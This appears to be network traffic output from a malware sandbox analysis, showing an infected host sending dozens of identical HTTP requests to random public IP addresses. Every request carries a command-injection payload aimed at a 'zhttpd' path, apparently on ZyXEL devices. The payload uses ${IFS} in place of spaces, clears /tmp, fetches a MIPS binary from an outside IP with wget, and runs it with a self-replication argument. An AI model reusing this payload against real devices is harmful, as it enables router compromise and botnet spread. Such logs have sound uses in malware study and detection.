                                        Jan 14, 2024 16:18:51.614342928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6146192.168.2.1340060135.122.42.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614378929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6147192.168.2.1357084109.152.181.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614420891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6148192.168.2.1334848216.136.160.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614468098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6149192.168.2.13445901.4.116.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614514112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6150192.168.2.1335230176.126.234.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614541054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6151192.168.2.136068819.88.60.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614598989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6152192.168.2.13418441.69.74.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614634991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6153192.168.2.1332980161.124.108.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614669085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6154192.168.2.134326293.28.70.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614695072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6155192.168.2.135922052.103.129.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614773989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6156192.168.2.1353276137.116.31.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614794016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6157192.168.2.1338778100.55.15.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614849091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6158192.168.2.1340330101.39.198.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614892960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6159192.168.2.1353566211.240.81.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614923000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6160192.168.2.133666017.175.182.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614976883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6161192.168.2.1349426205.22.136.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615016937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6162192.168.2.135933047.37.232.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615035057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6163192.168.2.1348548198.230.15.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615088940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6164192.168.2.136074495.139.0.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615114927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6165192.168.2.133648250.65.175.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615159035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6166192.168.2.1353102201.196.0.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615206003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6167192.168.2.135715668.60.108.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615233898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6168192.168.2.133626248.93.170.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615281105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6169192.168.2.1360748146.157.191.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615341902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6170192.168.2.1356278195.65.187.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615375042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6171192.168.2.1357678188.153.102.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615386963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6172192.168.2.1354876135.38.98.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615425110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6173192.168.2.135578079.44.242.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615468979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6174192.168.2.1349916220.1.2.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615508080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6175192.168.2.1360910145.41.63.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615515947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6176192.168.2.134272679.137.240.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615536928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6177192.168.2.1351776120.60.215.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615587950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6178192.168.2.1352946150.155.92.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615623951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6179192.168.2.1350262168.97.81.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615648985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6180192.168.2.1355316114.172.24.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615706921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6181192.168.2.134158280.236.237.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615739107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6182192.168.2.134023678.100.113.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615786076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6183192.168.2.1356260145.39.77.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615816116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6184192.168.2.134553691.89.191.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615824938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6185192.168.2.1344570164.255.58.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615860939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6186192.168.2.1350638180.201.70.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615900993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6187192.168.2.1336108140.191.73.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615917921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6188192.168.2.133981871.165.155.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615952015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6189192.168.2.133766052.29.245.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.615987062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6190192.168.2.134789253.189.130.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616036892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6191192.168.2.134118425.160.106.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616065025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6192192.168.2.135320450.138.121.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616094112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6193192.168.2.135463625.149.242.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616138935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6194192.168.2.133684867.25.188.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616168022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6195192.168.2.13547585.208.129.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616193056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6196192.168.2.135191686.110.131.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616256952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6197192.168.2.135148664.110.74.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616276979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6198192.168.2.1347044122.211.165.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616309881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6199192.168.2.134471262.63.27.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616348028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6200192.168.2.1336126121.20.222.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616414070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6201192.168.2.1335198182.0.10.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616441011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6202192.168.2.134323283.229.225.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616489887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6203192.168.2.134686283.236.173.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616508961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6204192.168.2.133847037.118.115.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616560936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6205192.168.2.1360052201.75.100.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616595030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6206192.168.2.135723898.9.59.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616638899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6207192.168.2.1357324102.39.58.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616683006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6208192.168.2.1342304200.220.213.136443
                                        TimestampBytes transferredDirectionData
